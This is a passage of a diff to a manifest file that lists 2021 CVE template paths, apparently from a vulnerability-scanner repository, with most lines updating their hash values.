http/cves/2021/CVE-2021-29505.yaml:499c17d9f306975010f29ed644e4c232907941b4 http/cves/2021/CVE-2021-29622.yaml:fac9f650cecf2b0249ff5db89704d89ac1ad2de3 -http/cves/2021/CVE-2021-29625.yaml:a7501143f8a0b262f13d0b5434dcf63044a488f7 +http/cves/2021/CVE-2021-29625.yaml:713bec5f0e59277fc2c600546eef6f6391005c48 http/cves/2021/CVE-2021-3002.yaml:689d379864c76a630eb3ad129fb379c2021a926e http/cves/2021/CVE-2021-30049.yaml:fc44294f44537b7426855643a448c2a138a2bb5c -http/cves/2021/CVE-2021-30128.yaml:134d93f79c77cd70cbc599670eb8ff53f0abfc0a +http/cves/2021/CVE-2021-30128.yaml:3e4d2385544d2ed99ecd54849e0d5f95a940ed54 http/cves/2021/CVE-2021-30134.yaml:dfca391ce0dc56cbf534854f4bbac3b95a451754 -http/cves/2021/CVE-2021-30151.yaml:0a9ce95ee01caf99bf9017de1b21df52107bbc42 +http/cves/2021/CVE-2021-30151.yaml:49405e80c0b546b3a1f18843bbe7d07a4e654459 http/cves/2021/CVE-2021-3017.yaml:804614220a942d8b22c7cfa4f2ec1d43b3b8b8d7 http/cves/2021/CVE-2021-30175.yaml:42ecbdc2f4dcbdc81e94bcfd6d31af0c0f011c78 http/cves/2021/CVE-2021-3019.yaml:f07c8e5cc5ec9b7ae1b7cb57a35a7cb17281bacf http/cves/2021/CVE-2021-30213.yaml:d78b5aba3bec5186aac1eadbcab658a2ab1d4fdb -http/cves/2021/CVE-2021-30461.yaml:f850fbb1ba00af98e42f6d64761ad04e73f7deaf +http/cves/2021/CVE-2021-30461.yaml:e4679016cb9207726026dbaddbfb2cb655a17fa9 http/cves/2021/CVE-2021-30497.yaml:475c233386c5ba0e18abcfdc0e304105c6a8a2e7 http/cves/2021/CVE-2021-3110.yaml:70a3a1b4da525f3cc12c8e320828c1de7787d711 -http/cves/2021/CVE-2021-31195.yaml:6071225b1f00b45e0e524243dcd2e418bdc44638 +http/cves/2021/CVE-2021-31195.yaml:9f9874e28b1438005fcb47686a747d31ea708ff5 http/cves/2021/CVE-2021-31249.yaml:514a2d8097e60e15ab5d5dea64714e8293db2b3a http/cves/2021/CVE-2021-31250.yaml:867864379eb75c9a81f7e05fb7b7919af58517e4 -http/cves/2021/CVE-2021-3129.yaml:c33b337720d1d13841d58cf3399a4f6fbeea5ea3 +http/cves/2021/CVE-2021-3129.yaml:5694259cd5fa48bf61f5de229d3df40be7ba0eeb http/cves/2021/CVE-2021-31537.yaml:ef4891cdc66df98a86793a3189fb01e160c98d7e http/cves/2021/CVE-2021-31581.yaml:e5c18e16322cbd210f5fe06933959260e2cf08fa -http/cves/2021/CVE-2021-31589.yaml:9fa9059c2f80f8acd452bf7735a34dc42c57285c -http/cves/2021/CVE-2021-31602.yaml:d6489a005a9b73c075baa06036d3da73de1480c6 -http/cves/2021/CVE-2021-31682.yaml:b27e14c816a3e0cd680e20283fc8ed2dd4af3fbf +http/cves/2021/CVE-2021-31589.yaml:0dfae2b99db6fafd6e15c9898077e7bdf657a313 +http/cves/2021/CVE-2021-31602.yaml:d0023080cb54e99769fb2e09d8d17273b3b9d167 +http/cves/2021/CVE-2021-31682.yaml:e822119f54791e2ef4c718ec27bf5e9c61cd5824 http/cves/2021/CVE-2021-31755.yaml:abd8d7371154a95f163a1536f988b90e708600c3 -http/cves/2021/CVE-2021-31805.yaml:18b42fc72af31b5c2a59f7984a0160592443cd9d +http/cves/2021/CVE-2021-31805.yaml:7cd135e51ab83da3571f5eb5445c63b11c5ef5ff http/cves/2021/CVE-2021-31856.yaml:02f2f826362c783a35fa70eee7772941eaddcde1 http/cves/2021/CVE-2021-31862.yaml:89473ea0b944e76fe6be8e9b83b2d2663ff6d8b3 http/cves/2021/CVE-2021-32030.yaml:c0a4636874282c087cf32c8e177c73dd9f771710 http/cves/2021/CVE-2021-32172.yaml:8fdebff02b3d16ee1e990072fd53e435b1e8dac7 -http/cves/2021/CVE-2021-3223.yaml:dca718c60b362e6eb9af88a8eb8157f058a61ea7 +http/cves/2021/CVE-2021-3223.yaml:ce67c2fe2f1e6807fff107e530a2af59a8132a23 http/cves/2021/CVE-2021-32305.yaml:70d9951aa4e2a64bd18be918d669dde6a9a18cf2 http/cves/2021/CVE-2021-32618.yaml:4874c4ff111966f4a1cad76dc222b1cbd967d88a -http/cves/2021/CVE-2021-32682.yaml:a7238f98502dd9f9433bc3252c50fe30baaae419 +http/cves/2021/CVE-2021-32682.yaml:1debd6d80a298832830303a188ad1145053356c7 http/cves/2021/CVE-2021-32789.yaml:03bf6b93c36208174b66afb4a806a53868ed54de -http/cves/2021/CVE-2021-32819.yaml:1774afef3c2ca020b98c215d7828010e292955f7 +http/cves/2021/CVE-2021-32819.yaml:a610826c3b2c87b593944d251252d133640c9822 http/cves/2021/CVE-2021-32820.yaml:b75870f452e12388c569089adbaafea642e0aad9 http/cves/2021/CVE-2021-32853.yaml:8b24fa2ce857eaa46e5aaa1f51ff391f839370d0 -http/cves/2021/CVE-2021-3293.yaml:4e2dedcc8e7116d054c3fcc34cb046a8b3a046a3 +http/cves/2021/CVE-2021-3293.yaml:56c0095427890fb36a4668a34638a7efebc36d50 http/cves/2021/CVE-2021-3297.yaml:77ace535639edee109758e3bd19687248d82829a http/cves/2021/CVE-2021-33044.yaml:f267244e663d85f45c06e5e6fa8f572c8777c177 http/cves/2021/CVE-2021-33221.yaml:9c58ce321de4f629f5d1762a2e1832c46dcccca4 http/cves/2021/CVE-2021-33357.yaml:24596aa2d592229a59bacaa77d7ec280fdf036ef -http/cves/2021/CVE-2021-33544.yaml:d7e4d07f08c54ce45f6494309d5da6997f792fdb +http/cves/2021/CVE-2021-33544.yaml:172f41e035466ae22c476c41b6eed990d9d17a0f http/cves/2021/CVE-2021-33564.yaml:a82110635a2629a0c81dc6b2984959c690d0c393 -http/cves/2021/CVE-2021-33690.yaml:0f3e9eeb77d3ff1363ddb0da9755eea741b3d310 +http/cves/2021/CVE-2021-33690.yaml:6c6a8d41a9ee18fcb9a60075462eaf4b61d72a90 http/cves/2021/CVE-2021-3374.yaml:d519f7466444215eb8fa36b51b72e8589eaad100 http/cves/2021/CVE-2021-3377.yaml:9bf0ad577fa9166abc78af4d61e6e441f41b2519 http/cves/2021/CVE-2021-3378.yaml:a842331f8c0924d398887c3ec42f8fbac970903c @@ -2236,152 +2236,152 @@ http/cves/2021/CVE-2021-33851.yaml:d37fb55018b8fb0d2a84a1be6c07984c49cf8c21 http/cves/2021/CVE-2021-33904.yaml:89ef9a57ce230eaba15109352d5a2754f31d0a0c http/cves/2021/CVE-2021-34370.yaml:a6bb7f8f166cf8c32e0d5413eb96c76d3fb3f6d1 http/cves/2021/CVE-2021-34429.yaml:8a584bf70eb9bdfd8daec086e96871d74f66e397 -http/cves/2021/CVE-2021-34473.yaml:fa24a4e5b3837a754935d6e3522f6adc12024350 +http/cves/2021/CVE-2021-34473.yaml:10542af5baf67e6693bd2b9385a48c4836cc1abb http/cves/2021/CVE-2021-34621.yaml:56f9dc43ee199038f49466b0b480aa7a964ac31f http/cves/2021/CVE-2021-34640.yaml:c4684c43b933c18e653b46096cbda6fb725fced4 http/cves/2021/CVE-2021-34643.yaml:c4eafb5f2cac85929b4960a12274dafdc30fd58f http/cves/2021/CVE-2021-34805.yaml:aaa2167c9c4e34633b7c9d8ba32e96031ce341d1 -http/cves/2021/CVE-2021-35250.yaml:b8492695a2a90862ac905826f4290ab68b78227f -http/cves/2021/CVE-2021-35265.yaml:32e419643525a74d6aa0edacd139d81656a84dc1 -http/cves/2021/CVE-2021-35323.yaml:c021c3f08721a56c3b2a11eb350e50931d10959d +http/cves/2021/CVE-2021-35250.yaml:b3942a07d82f8ed08fdae56dc7f5645379fb6870 +http/cves/2021/CVE-2021-35265.yaml:5a188ab0d95e07fb47b5410b87058202017d5545 +http/cves/2021/CVE-2021-35323.yaml:9c05a88d0c6d8953a7c4908456c722ef6f506bfc http/cves/2021/CVE-2021-35336.yaml:a73c5bd76374c5db032ec1b03a3a833dbad07feb -http/cves/2021/CVE-2021-35380.yaml:a68669d1f2753320f002312d3adaf1d194ab654d +http/cves/2021/CVE-2021-35380.yaml:ab7d6f68e2a800f46e4669c551042292694c7caf http/cves/2021/CVE-2021-35395.yaml:d18dfdd20fc2124b6f6156bcc999c57407f34d33 -http/cves/2021/CVE-2021-35464.yaml:8be33ab011020e788015a19b946956828e6a0416 -http/cves/2021/CVE-2021-35488.yaml:e8e6daabb091537fb68769bc25393f2a59017fdb -http/cves/2021/CVE-2021-35587.yaml:06e8f297d113031339fbe3a65c7f5f8f69501ce1 +http/cves/2021/CVE-2021-35464.yaml:a4c0cc22c8266aef35887238beb34fad9230b3f5 +http/cves/2021/CVE-2021-35488.yaml:5fd0c8b01b73f607d99dee4490edb890a1b898ba +http/cves/2021/CVE-2021-35587.yaml:de75a3cc9f525b13723787f3131c3e3b7df17d13 http/cves/2021/CVE-2021-3577.yaml:f363338587c0c4eb79c5eb65cb54b01f0e62ccee http/cves/2021/CVE-2021-36260.yaml:64ff273b05ae0ed2d4a2f909ef25fef624192c72 http/cves/2021/CVE-2021-36356.yaml:ff2b6d790262793cd6ad07b08632309c64ac0ddd http/cves/2021/CVE-2021-36380.yaml:dc4250aaa3237110ffeb1b75dd8f00990ac7a4cd -http/cves/2021/CVE-2021-36450.yaml:30add85f8e2fceb486735a59b38d4f844dc93a9d +http/cves/2021/CVE-2021-36450.yaml:f790e77023f8980246d450deb1d6599f7f53da65 http/cves/2021/CVE-2021-3654.yaml:87e0613f4f6a62e23538b469f523b3e6357b1458 -http/cves/2021/CVE-2021-36580.yaml:694d82a3da4dfd6e628e95cc0073c88ae6ba803b +http/cves/2021/CVE-2021-36580.yaml:dc6c4ac7083e63c2fe45a6e82fa9bba51964575e http/cves/2021/CVE-2021-36748.yaml:113ef42346ebce2bd76538669dcdfeb52509d713 http/cves/2021/CVE-2021-36749.yaml:3b0a7b9a9d14edf603248b938e61d7db03f084a7 http/cves/2021/CVE-2021-36873.yaml:cbff75f79e65e669b04b3b174ef61d586109cc6b http/cves/2021/CVE-2021-37216.yaml:79f6fb2bedd55cef9c44cd8a90e800cbd1714802 -http/cves/2021/CVE-2021-37304.yaml:02c50dc6a856643ea8de82ef2e7ad928c3f31ccf -http/cves/2021/CVE-2021-37305.yaml:c8f1386f0df602d42543b567a2fc05436c38c2cf -http/cves/2021/CVE-2021-37416.yaml:b9bd9211ae43ec9efc92f1b6bc8faeff8c4c483c -http/cves/2021/CVE-2021-37538.yaml:f48074a0bf7aa769a35e69f55c46296cfbefbdf6 +http/cves/2021/CVE-2021-37304.yaml:0bdab04a4c8d37cd4cb1e566a1e737193f51c9ba +http/cves/2021/CVE-2021-37305.yaml:b24c6837ab155a40d531025aa33274d368747a5b +http/cves/2021/CVE-2021-37416.yaml:aa9c8ef2b694bbc86e94bfc563cd2c7979d8a734 +http/cves/2021/CVE-2021-37538.yaml:543ad4aeeccd674275f524afe3a5b6909f57a208 http/cves/2021/CVE-2021-37573.yaml:bedcd4e63e8593038e1536ae1ff0ba4400d98c74 http/cves/2021/CVE-2021-37580.yaml:f5dc24043216b36560265de80278583728faf8b2 http/cves/2021/CVE-2021-37589.yaml:d69d7cccc5a283cba577bf63d83b2d1943385f75 http/cves/2021/CVE-2021-37704.yaml:6d7a10739f7c4d531b01d13b3cd734068f58fdfc -http/cves/2021/CVE-2021-37833.yaml:bbd01d34f36358af8e893c1014935481c6b974d7 +http/cves/2021/CVE-2021-37833.yaml:e9cbdfefbc2426c4c32a98d8605f766ade0bcee1 http/cves/2021/CVE-2021-38314.yaml:e43ac750d1856a2d72b10c003a5f69fcb060db10 -http/cves/2021/CVE-2021-38540.yaml:0fd236e273150e5a74e09bceaa0f8eb1f1c4ea25 -http/cves/2021/CVE-2021-38647.yaml:33869f004b339925e1887ad27c14d1f97c88e4e2 +http/cves/2021/CVE-2021-38540.yaml:00b59f51b8b6bd546ae1443467b4c6cd318fef28 +http/cves/2021/CVE-2021-38647.yaml:d3f362730e7af913985dc415c806983d72f4f665 http/cves/2021/CVE-2021-38702.yaml:7cb9a26484056f0955a7a91dd5ec2c6fa524df75 -http/cves/2021/CVE-2021-38704.yaml:57b43442be5fee9b3e886124bd761bc48329f4ac -http/cves/2021/CVE-2021-38751.yaml:b2db52101696b760c965b1f7e0085a6f60e6163c +http/cves/2021/CVE-2021-38704.yaml:45de47e864fa4f76bffb4c0819f328cde2d777f4 +http/cves/2021/CVE-2021-38751.yaml:129511c223c64e42311566beb450fa99c97ac671 http/cves/2021/CVE-2021-39141.yaml:658ae606eefaee8e5ed50c513aff80caa008aa2f http/cves/2021/CVE-2021-39144.yaml:df10799e1ee8eb495557350715a2105e62845151 -http/cves/2021/CVE-2021-39146.yaml:7ab354f875634a920f91701449cb81fc8dd51cb4 -http/cves/2021/CVE-2021-39152.yaml:c080a8c46a7d1baed21cf75b1452308f96353412 +http/cves/2021/CVE-2021-39146.yaml:6ced53b90254c74c5a35b67d00c776c1aae0e1d3 +http/cves/2021/CVE-2021-39152.yaml:ccbd9449525555e79a34a562ceee2264622470dd http/cves/2021/CVE-2021-39165.yaml:41cb34053dcde697cdc2743a80c304656985e504 -http/cves/2021/CVE-2021-39211.yaml:d39cfb4c5a20b929a7c5dec41679119ef73f85e9 -http/cves/2021/CVE-2021-39226.yaml:e487a56f909e9d1095786ef27f542a8a66cd205f +http/cves/2021/CVE-2021-39211.yaml:4d7f0b468d404e83a4f7317b87ba0e1b0b79265f +http/cves/2021/CVE-2021-39226.yaml:d59d4b479bf607b76bc705a325473543be39d0cc http/cves/2021/CVE-2021-39312.yaml:eea2b37fd676c4075a9b388b8f27a51308c86f2e http/cves/2021/CVE-2021-39316.yaml:987c2e078d53725debd4637ce5c6d9f72914f683 http/cves/2021/CVE-2021-39320.yaml:002e6f6fcf6a88cd25bb3b423f9868e28ef80d59 http/cves/2021/CVE-2021-39322.yaml:6408a97278c6cf53fa277c226aa71b95f766fb41 -http/cves/2021/CVE-2021-39327.yaml:940c1899b231b7310ed48ffc1692c265d75fdda7 -http/cves/2021/CVE-2021-39350.yaml:03f56a807e1a46070a1a58bbd6917a4ea804a4ce +http/cves/2021/CVE-2021-39327.yaml:b68ca21ea6aa4ef2b53070d281ffaf5c93c4f376 +http/cves/2021/CVE-2021-39350.yaml:f71503545a488a2c7561025645a38051f1ca50e8 http/cves/2021/CVE-2021-39433.yaml:9ebfc436d00bdfee4b944d1764beb52757dd085e -http/cves/2021/CVE-2021-39501.yaml:3ef6a79e6783c528295d53ea6dd1e76fbbb7157d -http/cves/2021/CVE-2021-40149.yaml:2f040a01c1e9030be90ad0d77d80f01a1a291645 -http/cves/2021/CVE-2021-40150.yaml:a8b29c8b65bbb22ed53358e86d18e1c2d68a90a9 +http/cves/2021/CVE-2021-39501.yaml:01d679a4f1a9a229bac9637f3af4ecc685438688 +http/cves/2021/CVE-2021-40149.yaml:22f252f24830526273b9c6aa2678d0c8c9096cdd +http/cves/2021/CVE-2021-40150.yaml:ee040883fde9ed59da57128aa23f3d22d19b9e85 http/cves/2021/CVE-2021-40323.yaml:c887688f619ed428bfa00a8a3d1f560f50c4ee16 -http/cves/2021/CVE-2021-40438.yaml:5017fb9e1e48892198d0a204a547f26e393bf26a -http/cves/2021/CVE-2021-40539.yaml:ac0b4de3d6f4201b058ca3dbd6bb46eecfc33b80 -http/cves/2021/CVE-2021-40542.yaml:52f29d0ba20ee18d467144b89399d969bf973ac6 -http/cves/2021/CVE-2021-40651.yaml:cbe8219eec2c8cb455286b0808d3471a8bb6cb8a -http/cves/2021/CVE-2021-40661.yaml:54a6c0c08a555b2f8a877d96d82aaa7e9009c663 -http/cves/2021/CVE-2021-40822.yaml:bec122f20f1ef325a1f9f8b629c1fda6dec189e6 +http/cves/2021/CVE-2021-40438.yaml:92ae0ef7dc7f3ec220204549422d1440c1f66661 +http/cves/2021/CVE-2021-40539.yaml:f26af7091f5ddcccbdda9b1e7e9a53116c3bdd77 +http/cves/2021/CVE-2021-40542.yaml:1297bc151c902d125758a5c045b82542360cfc13 +http/cves/2021/CVE-2021-40651.yaml:a83a0838b42e093efe97dc38e42d1da816e92af3 +http/cves/2021/CVE-2021-40661.yaml:4598303d573ea64f5faa7315e93fcd868e0ae284 +http/cves/2021/CVE-2021-40822.yaml:d993adc0023f02ddd43df37c3649de6efcec39e1 http/cves/2021/CVE-2021-40856.yaml:4aadf3d80dd73b612020a8d1ca20c5111201a957 http/cves/2021/CVE-2021-40859.yaml:a8a6ab85fce3e1aab3d083ea9f6e20657d55a958 http/cves/2021/CVE-2021-40868.yaml:c5c30fe3252bae32bf85e6b63c764d1c219d3cc7 http/cves/2021/CVE-2021-40870.yaml:46d3de8e6493f2e904332956193f0421aff425a3 -http/cves/2021/CVE-2021-40875.yaml:764d8ffca73f1cc46af7a9bdb465754dcbaf8b3f +http/cves/2021/CVE-2021-40875.yaml:ad92995245e69583a64cfa285eeeb43f21cf8774 http/cves/2021/CVE-2021-40908.yaml:78115ff3db4e03b21cb56370d0c01957d7539d8f http/cves/2021/CVE-2021-40960.yaml:0da341f855c1b922e90c84d04bd50f6b10c66eb9 -http/cves/2021/CVE-2021-40968.yaml:fab0a7a100a159208930eec149ac0b39a21ee9df -http/cves/2021/CVE-2021-40969.yaml:00cc312618b127ed6224974925cf7e8d0c778a99 -http/cves/2021/CVE-2021-40970.yaml:812a802bdb3dfed9200701231e66f2f16ca64254 -http/cves/2021/CVE-2021-40971.yaml:7833b1168af2c32e2a4cf2c4bdcf942f309a521b -http/cves/2021/CVE-2021-40972.yaml:2fe68e5934cea7eb8e7f44c3d0fe745470a1e0c9 -http/cves/2021/CVE-2021-40973.yaml:f8e519c6b544ea22d7c3d06dc5628c470e311dc2 +http/cves/2021/CVE-2021-40968.yaml:c2ec3b974da0e66945080fd1886c1ff461ad1c43 +http/cves/2021/CVE-2021-40969.yaml:0fc2858bf59d512570d1bfcfa70b71e2f0ee7328 +http/cves/2021/CVE-2021-40970.yaml:491126d6f56c72a916589ce2e5b4f5cfb8631646 +http/cves/2021/CVE-2021-40971.yaml:3c69a2b590e80c26fca8bebfce920ee283294e4c +http/cves/2021/CVE-2021-40972.yaml:08c80e72a9e7c254d847edc82d58b8d7bc36560c +http/cves/2021/CVE-2021-40973.yaml:5d165fee13c80e532b0d2d958b9ce9430bc8df4d http/cves/2021/CVE-2021-40978.yaml:a8c962c57edc1d0760271c053d5cae56c23ba5e9 -http/cves/2021/CVE-2021-41174.yaml:e83dd147ef533cbf46398ab8bea7cbfaeb6fea6d +http/cves/2021/CVE-2021-41174.yaml:60c0f85d4cdeb2f4254255f0b8cb36ce8d339bdf http/cves/2021/CVE-2021-41192.yaml:079fec1025e916731f1ec243fa5873ba272fa007 http/cves/2021/CVE-2021-41266.yaml:8d081cc6e83f9e2b3397e60a81a16ec1a281b930 -http/cves/2021/CVE-2021-41277.yaml:156d591678fc667638c340e306bb9380bd8b1e70 -http/cves/2021/CVE-2021-41282.yaml:6a3a4bc97283c0458c5e6159243a100e7123b3d7 +http/cves/2021/CVE-2021-41277.yaml:cd28b20ec2f663f0f6404b8b792018739daf91d1 +http/cves/2021/CVE-2021-41282.yaml:3e690130d759326a730125d030c2cc37207937ee http/cves/2021/CVE-2021-41291.yaml:984169427a50e27703f9eb32406ce40e1a36a4d5 http/cves/2021/CVE-2021-41293.yaml:126b34d1fa897ebca33a0331d478a68544c96235 -http/cves/2021/CVE-2021-41349.yaml:1ba875a8b72e9587e7b725360c9e44a39bfd470c -http/cves/2021/CVE-2021-41381.yaml:c66efc83ef068a0ad406e506e6e82646d90f12c7 -http/cves/2021/CVE-2021-41432.yaml:42b5ebe80c69593f470d154b0327515b07d9d19c -http/cves/2021/CVE-2021-41460.yaml:91c1b4c21142677a5b6c7513cddaaa28b7ae9395 +http/cves/2021/CVE-2021-41349.yaml:8c3f7ee3984e756b1eaadbeddb01813acbd197b4 +http/cves/2021/CVE-2021-41381.yaml:7d0ad6ebdccbd2ba1cbbcff00b02014e1d237b46 +http/cves/2021/CVE-2021-41432.yaml:5a5f120acb4a3100f61530178a1f55898fc7fb10 +http/cves/2021/CVE-2021-41460.yaml:15ca399b84b67c4cda1a7bd22a8cdefe4677a78f http/cves/2021/CVE-2021-41467.yaml:51e9bf3d8ad65e48d1dba90b473d125995f54de3 http/cves/2021/CVE-2021-41569.yaml:2c2ba97cff9b68cc6c448a1fb49c4e190460d10d -http/cves/2021/CVE-2021-41648.yaml:0830c156f6bc78d231c676ba030940a6a749b63c +http/cves/2021/CVE-2021-41648.yaml:20d6d3bacdec1826daa0a0c76e9e7332cd66ab73 http/cves/2021/CVE-2021-41649.yaml:acc19e8708a6a4f3a502515195f6be004882f0e9 -http/cves/2021/CVE-2021-41653.yaml:f71dff1f3e8ca1c6d8abb9eb8cea9e6b87fffda6 +http/cves/2021/CVE-2021-41653.yaml:8e90153a87d796a1574cf4619f3055280b12f263 http/cves/2021/CVE-2021-41691.yaml:d5c6275154110bdc9d78c09dadce004287917630 -http/cves/2021/CVE-2021-41749.yaml:9f6b2ca98ec0eaa27f3672991d4317a7417b0100 -http/cves/2021/CVE-2021-41773.yaml:047b7d981eaeecae4ee3bfc65f26c3490be66d66 +http/cves/2021/CVE-2021-41749.yaml:cc587c32a3e921fdfb411bec3f530ba849bcfac6 +http/cves/2021/CVE-2021-41773.yaml:700267d4a258040cb48cc344f1869a933d4b9616 http/cves/2021/CVE-2021-41826.yaml:a8141bbbbc83b841143f8ac04fbbf369f77d54c6 http/cves/2021/CVE-2021-41878.yaml:8e2605b78d43422b23f6e5e263977290e45e1ea9 -http/cves/2021/CVE-2021-4191.yaml:1701a624f37677a6a1a9110c0919eaff1c320470 +http/cves/2021/CVE-2021-4191.yaml:23247a6e0871a5c198265f9dde70a0b6b46a9720 http/cves/2021/CVE-2021-41951.yaml:4bc3fdf1d171b6203536f93edcb69ad6d6497afc -http/cves/2021/CVE-2021-42013.yaml:857542c251ce1df640072d77f870a648142228e9 -http/cves/2021/CVE-2021-42063.yaml:d34b09a91e9704893bdbd59a3bcc6da304e950d3 +http/cves/2021/CVE-2021-42013.yaml:cdd04276d1270339c5f121566be167c53be2ec4e +http/cves/2021/CVE-2021-42063.yaml:337ac03bcd22332edfbed770b8b52d50f4b5954e http/cves/2021/CVE-2021-42071.yaml:748f0615ef4142655d78ba5d86dd052c447ad312 -http/cves/2021/CVE-2021-42192.yaml:0d406d353b93321f9f43c8617cdd40910aee18a5 -http/cves/2021/CVE-2021-42237.yaml:620ada80bb541470a6d1d4c3fbd37a8e49e40cfe +http/cves/2021/CVE-2021-42192.yaml:05aa46e6c8961027d30355f8ef664e23c932c19a +http/cves/2021/CVE-2021-42237.yaml:7785c04afcda288a651a57b1956364368c1a41e7 http/cves/2021/CVE-2021-42258.yaml:ad213c4af31afd36d0ff95b7e52260947aa2013d -http/cves/2021/CVE-2021-42551.yaml:9d19e6a83008f6db2b3156a91771dbc5c7a34eba +http/cves/2021/CVE-2021-42551.yaml:c8a96ae82a393d94487d9ad4981317701d1dc5b9 http/cves/2021/CVE-2021-42565.yaml:349855ab852f856d965c2509f381cd6a280db83c http/cves/2021/CVE-2021-42566.yaml:6b4fea8d01a39aa24b8cb907502508b290479015 -http/cves/2021/CVE-2021-42567.yaml:5f048dc5228bc530cadaf65cbc515c6a994bec02 -http/cves/2021/CVE-2021-42627.yaml:0c7089e1b4e500640d5a8dee4135777d173a6de1 -http/cves/2021/CVE-2021-42663.yaml:d8a831221ce19e89a9d16c0a027324c7e1d31228 +http/cves/2021/CVE-2021-42567.yaml:57a6aa55e5273e8f17d5694d075f4737cb424054 +http/cves/2021/CVE-2021-42627.yaml:43dbfbdc4f45b60ace5ca83ed56fb6a1fc25f70e +http/cves/2021/CVE-2021-42663.yaml:f4e034acf4696f02d2a628f2c4e1eedfe8f16c70 http/cves/2021/CVE-2021-42667.yaml:c19169cb40060f91bb99ef5323b157fa0fbf6297 -http/cves/2021/CVE-2021-42887.yaml:86422a34b8fb5635253b1269cad9aaaa7798d5ce -http/cves/2021/CVE-2021-43062.yaml:42e80e2833602392d9abcf0fdaab4a48668435e0 -http/cves/2021/CVE-2021-43287.yaml:5c61036d8f4fa95e44a1ef1ec2d4b32ef9d6cca0 +http/cves/2021/CVE-2021-42887.yaml:536e1d78ad9b1c5ce6b1933cb5dbe9b213dc3860 +http/cves/2021/CVE-2021-43062.yaml:12b156039944e761f430da19d172b9931413cf27 +http/cves/2021/CVE-2021-43287.yaml:4d560ad16975ff68d95fdd7d73919d8e612bf1f3 http/cves/2021/CVE-2021-43421.yaml:75cab9aa0d3a6b660677a75116558d3b7c555ff1 http/cves/2021/CVE-2021-43495.yaml:7976f205a306ddb65f565049e3f4451bd9a5ce92 http/cves/2021/CVE-2021-43496.yaml:550ea33b0e0144d91382b8351c5ff8331b6e3bdf http/cves/2021/CVE-2021-43510.yaml:e90f6fcbc02221af5c21502f37214e7dbb03da06 -http/cves/2021/CVE-2021-43574.yaml:c7d88cc7cb4452e8102a11fdf3f2c2dc7f811c14 -http/cves/2021/CVE-2021-43725.yaml:0b058af2678906d19524e46a7c001e4d0c9cf3b3 -http/cves/2021/CVE-2021-43734.yaml:3ae893857308561ed8432d1765d0c7188381456b +http/cves/2021/CVE-2021-43574.yaml:1ed9cbda3d1c18508f7609db4ca052f8370f1399 +http/cves/2021/CVE-2021-43725.yaml:ee7b3da4f4eccf2d4485a7e2ee426dbc619562dc +http/cves/2021/CVE-2021-43734.yaml:ba2e81ae59684a8bcfde140cc091cb3a77e3f427 http/cves/2021/CVE-2021-43778.yaml:2f3bb0a0f9ad88cc38b6dfa0abda010822203ea9 -http/cves/2021/CVE-2021-43798.yaml:2cba60db37dbdeaac39530054943c44e7a0fa3c1 +http/cves/2021/CVE-2021-43798.yaml:6afb9139e24bf0c40b9e5a0c12e49f83793920c2 http/cves/2021/CVE-2021-43810.yaml:e091cab75505c3576561a0e55d7f45be46ed0e9f http/cves/2021/CVE-2021-44077.yaml:cb77a5c0a315f9be21761f87ed2d2c7d51fd1d5d -http/cves/2021/CVE-2021-44138.yaml:d3eba1f5b10514f1cf0f214a3f90e9a179e72fb4 -http/cves/2021/CVE-2021-44139.yaml:1216fbac2f54785db4dc01e9e64de046ad4d7564 -http/cves/2021/CVE-2021-44152.yaml:583b6e4a9e6e66be548bebfd3acf7cfcff918052 +http/cves/2021/CVE-2021-44138.yaml:a802f5e3f53e4f8211dfd348b2ca5ddcb9304732 +http/cves/2021/CVE-2021-44139.yaml:740e49a49ce3c88b450eabd43ae798ffcacf8a0e +http/cves/2021/CVE-2021-44152.yaml:1930aeb138e46dbadc2969661cf98871caf3a9ac http/cves/2021/CVE-2021-44228.yaml:8874a4c3724b6c1c3ea43e62fbb9ecdca5d3772f http/cves/2021/CVE-2021-44427.yaml:2c4dacfc13a61ca0565e786199ea8ddff21bf839 -http/cves/2021/CVE-2021-44451.yaml:9fd4fc8b354b2d70ac8d12b3c2fabf0dac97353d -http/cves/2021/CVE-2021-44515.yaml:05859e5f2d169b5f4d9a0faf67b3890ad53044de -http/cves/2021/CVE-2021-44528.yaml:415702074e6837f16d577237fb7b378149d8ba33 -http/cves/2021/CVE-2021-44529.yaml:23741df7348b1b95ccd3548115b8b1e63def45a7 +http/cves/2021/CVE-2021-44451.yaml:3c62b0760c7c5a67589eb5a97b8b058f1c5a534f +http/cves/2021/CVE-2021-44515.yaml:e4737487534b10d29b6f7d59ce84d88792faa3a0 +http/cves/2021/CVE-2021-44528.yaml:d6a94cf7d21895a2cc86705af681d1afee044ab8 +http/cves/2021/CVE-2021-44529.yaml:04add990e97b15ea614c2f571cfd49b911c7ca37 http/cves/2021/CVE-2021-44848.yaml:bd86dec475898fda93191256ca601bc9f17d2dd6 http/cves/2021/CVE-2021-44910.yaml:9fb4989116e0167c603c3ea4a0bcac68841d7b04 -http/cves/2021/CVE-2021-45043.yaml:ff41e0711c6e413b2c0ced1ff9c5cf818fb8b811 +http/cves/2021/CVE-2021-45043.yaml:b7ee1fca9a6f48919a25193f954a24e25c9826c3 http/cves/2021/CVE-2021-45046.yaml:afbe6d9a4df0b57c8853d9fce778442240163d57 http/cves/2021/CVE-2021-45092.yaml:961fde42602a37607b86120d8a299db382e42444 http/cves/2021/CVE-2021-45232.yaml:c09fc24183a14f9ad3bc2e917a0c58cd2bedb705 -http/cves/2021/CVE-2021-45380.yaml:a347426c3554fa83e6cfc5472d03085fa781c93b +http/cves/2021/CVE-2021-45380.yaml:f24398df04fa60b12219061f6d11cc69fa9f6df6 http/cves/2021/CVE-2021-45382.yaml:cb0aa02a98b1cdfda90a720aed418fb486944046 -http/cves/2021/CVE-2021-45422.yaml:22cd235389b717aa077aa28d079a9667685c7cc8 +http/cves/2021/CVE-2021-45422.yaml:2cf95513dc085cd08d0a9217c72c63192320ade9 http/cves/2021/CVE-2021-45428.yaml:14d98248ac661705a256a679f0eb6e1e48233c2b http/cves/2021/CVE-2021-45967.yaml:1c060977d1fab68ce71716addc499b6eaea77589 http/cves/2021/CVE-2021-45968.yaml:921c33e7aeeb0b0ce6f57a9e457d202de0285cd8 @@ -2390,17 +2390,17 @@ http/cves/2021/CVE-2021-46068.yaml:1b53ecee2963550e1b687c2c93a33974ce779452 http/cves/2021/CVE-2021-46069.yaml:7783bc454b975263aac0f62dbfdb460f0c3c42c0 http/cves/2021/CVE-2021-46071.yaml:a76d33573617d153689d9213a457a03115c736e4 http/cves/2021/CVE-2021-46072.yaml:ea0e7e2699eff6c50de4bd5ca80d862ba3ceb89e -http/cves/2021/CVE-2021-46073.yaml:98780e5d0d49b0f4a07ce3bdb4f9a4232cf6ecc2 